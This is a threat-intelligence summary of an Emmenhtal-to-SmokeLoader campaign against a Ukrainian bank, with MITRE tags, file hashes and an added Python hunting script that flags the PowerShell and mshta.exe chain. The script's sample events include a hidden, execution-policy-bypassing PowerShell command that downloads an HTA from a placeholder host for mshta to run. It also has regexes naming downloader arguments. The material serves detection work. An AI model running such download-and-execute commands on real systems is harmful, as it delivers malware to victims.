A malicious campaign targeting First Ukrainian International Bank has been observed using the Emmenhtal loader to distribute SmokeLoader. The infection chain begins with a lure email carrying a 7z archive that extracts to a decoy PDF and a Windows shortcut (.lnk). Opening the shortcut downloads additional files and leads to the execution of PowerShell and mshta.exe, which retrieve the Emmenhtal loader. Emmenhtal, disguised as a modified legitimate Windows utility, deploys SmokeLoader while keeping the execution flow stealthy. SmokeLoader is a modular downloader that can fetch additional payloads, steal credentials and execute remote commands. The campaign demonstrates the evolving tactics of financially motivated threat actors, which here rely on LOLBAS binaries (PowerShell, mshta.exe) and commercial protection tools for obfuscation.
Author: AlienVault
Related Tags:
emmenhtal
T1564.004
T1218.005
Cryptbot
Obfuscation
mshta
Banking
T1059.001
SmokeLoader
Associated Indicators:
SHA-256:
EA3C8DBE0B30FB6D5C68EB55454B2A9471E8E21ABB4343306445B4905370F51C
A1706EC6772DAA7A54C67117D5CE7B5FD5285F6245AD08F46B3B4176A7F1E021
4EE62002F89DFFA52405DF9C082CBA4D4DFA7DE7A207CB3A3F37BE76CA6454C4
DD510900D091A35F0EF6D906BE087A1AE7969E3D75450CEF475E1A032736CC20
AE64762D044F4B108F2FF820C0744D199C4C33616AF17C35C3634AEF79C4E3FF
SHA-1:
E67CF0E21C1AF1D6B765F8F8732729893E1B910C
2C23965943ABEF32A07020BDA8B17C61F459DAE6
MD5:
9DC41C7FBF291A63621EB8B67DD01668
945D7AE4CC00199EF83CDAD88BAC4C6B
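The following is an added hunting example, not AlienVault's code or part of the pulse. It turns the described chain (shortcut clicked in Explorer, PowerShell downloading a payload, mshta.exe executing it, tagged T1059.001 and T1218.005 above) into detection logic run over process-creation events, and matches observed file hashes against the indicator list above. The events are constructed for illustration (the host 198.51.100.7 is a TEST-NET placeholder, and the paths are invented); the key=value log format, the regex heuristics and the field names are assumptions, not a description of any real telemetry source.

```python
"""Hunting helpers for the Emmenhtal -> SmokeLoader chain described in the pulse.

Added example, not AlienVault's code. The process-creation events below are
constructed for illustration; only the hash list is taken from the pulse.
"""
import re
from dataclasses import dataclass

# File hashes from the pulse's indicator list (SHA-256, SHA-1 and MD5 mixed).
PULSE_HASHES = {h.lower() for h in (
    "EA3C8DBE0B30FB6D5C68EB55454B2A9471E8E21ABB4343306445B4905370F51C",
    "A1706EC6772DAA7A54C67117D5CE7B5FD5285F6245AD08F46B3B4176A7F1E021",
    "4EE62002F89DFFA52405DF9C082CBA4D4DFA7DE7A207CB3A3F37BE76CA6454C4",
    "DD510900D091A35F0EF6D906BE087A1AE7969E3D75450CEF475E1A032736CC20",
    "AE64762D044F4B108F2FF820C0744D199C4C33616AF17C35C3634AEF79C4E3FF",
    "E67CF0E21C1AF1D6B765F8F8732729893E1B910C",
    "2C23965943ABEF32A07020BDA8B17C61F459DAE6",
    "9DC41C7FBF291A63621EB8B67DD01668",
    "945D7AE4CC00199EF83CDAD88BAC4C6B",
)}

# Constructed process-creation events (NOT real telemetry) in key=value form.
# pid 4120/4136 model the chain in the pulse: a shortcut clicked in Explorer
# spawns PowerShell, which fetches an HTA and hands it to mshta.exe.
# pid 5300/6100 are benign uses of the same binaries and must not be flagged.
SAMPLE_EVENTS = r'''
pid=1200 ppid=900  image=C:\Windows\explorer.exe cmd="C:\Windows\explorer.exe"
pid=4120 ppid=1200 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd="powershell.exe -w hidden -ep bypass -c iwr http://198.51.100.7/x.hta -OutFile $env:TEMP\x.hta"
pid=4136 ppid=4120 image=C:\Windows\System32\mshta.exe cmd="mshta.exe C:\Users\u\AppData\Local\Temp\x.hta"
pid=5300 ppid=1200 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd="powershell.exe Get-ChildItem C:\Reports"
pid=6100 ppid=5000 image=C:\Windows\System32\mshta.exe cmd="mshta.exe C:\Program Files\Vendor\ui.hta"
'''

KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
# PowerShell arguments typical of a downloader stage (T1059.001). Heuristic.
PS_SUSPECT = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-e(?:nc|ncodedcommand)?\s|-ep\s+bypass|\biex\b|"
    r"invoke-expression|downloadstring|\biwr\b|invoke-webrequest|https?://", re.I)
# mshta.exe fed a remote URL, inline script, or a file from a user-writable
# drop location (T1218.005). Legitimate HTAs under Program Files are not flagged.
HTA_SUSPECT = re.compile(r"https?://|javascript:|vbscript:|\\temp\\|\\appdata\\|\\downloads\\", re.I)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}


@dataclass
class Event:
    pid: int
    ppid: int
    image: str
    cmd: str


@dataclass
class Finding:
    pid: int
    technique: str
    reason: str


def parse_events(text):
    """Parse key=value lines into Event objects (quoted values may contain spaces)."""
    events = []
    for line in text.strip().splitlines():
        kv = {k: q if q else u for k, q, u in KV.findall(line)}
        events.append(Event(int(kv["pid"]), int(kv["ppid"]), kv["image"], kv["cmd"]))
    return events


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(ev, by_pid):
    """Image basenames of the parent chain, nearest first; stops at unknown pids."""
    chain, seen, cur = [], set(), by_pid.get(ev.ppid)
    while cur and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(basename(cur.image))
        cur = by_pid.get(cur.ppid)
    return chain


def detect(events):
    """Flag PowerShell (T1059.001) and mshta.exe (T1218.005) use matching the chain."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        name, parents = basename(ev.image), ancestors(ev, by_pid)
        if name in ("powershell.exe", "pwsh.exe"):
            m = PS_SUSPECT.search(ev.cmd)
            if m:
                reason = f'suspicious argument "{m.group(0).strip()}"'
                if "explorer.exe" in parents:
                    reason += "; launched from explorer.exe, consistent with a clicked shortcut"
                findings.append(Finding(ev.pid, "T1059.001", reason))
        elif name == "mshta.exe":
            m = HTA_SUSPECT.search(ev.cmd)
            scripted = parents and parents[0] in SCRIPT_HOSTS
            if m or scripted:
                parts = []
                if m:
                    parts.append(f'argument contains "{m.group(0)}"')
                if scripted:
                    parts.append(f"spawned by {parents[0]}")
                findings.append(Finding(ev.pid, "T1218.005", "; ".join(parts)))
    return findings


def match_hashes(observed):
    """Return observed digests (any case) that appear in the pulse's indicator list."""
    return sorted(h.lower() for h in observed if h.lower() in PULSE_HASHES)


if __name__ == "__main__":
    for f in detect(parse_events(SAMPLE_EVENTS)):
        print(f"pid {f.pid} {f.technique}: {f.reason}")
```

On the constructed sample the two malicious events (pids 4120 and 4136) are flagged and the two benign uses of PowerShell and mshta.exe are not; the parent-chain check is what ties the mshta.exe launch back to the PowerShell stage rather than treating every HTA execution as hostile. Hash matching is exact, so it only catches the specific samples listed above; the process-chain logic is what carries over to re-packed variants.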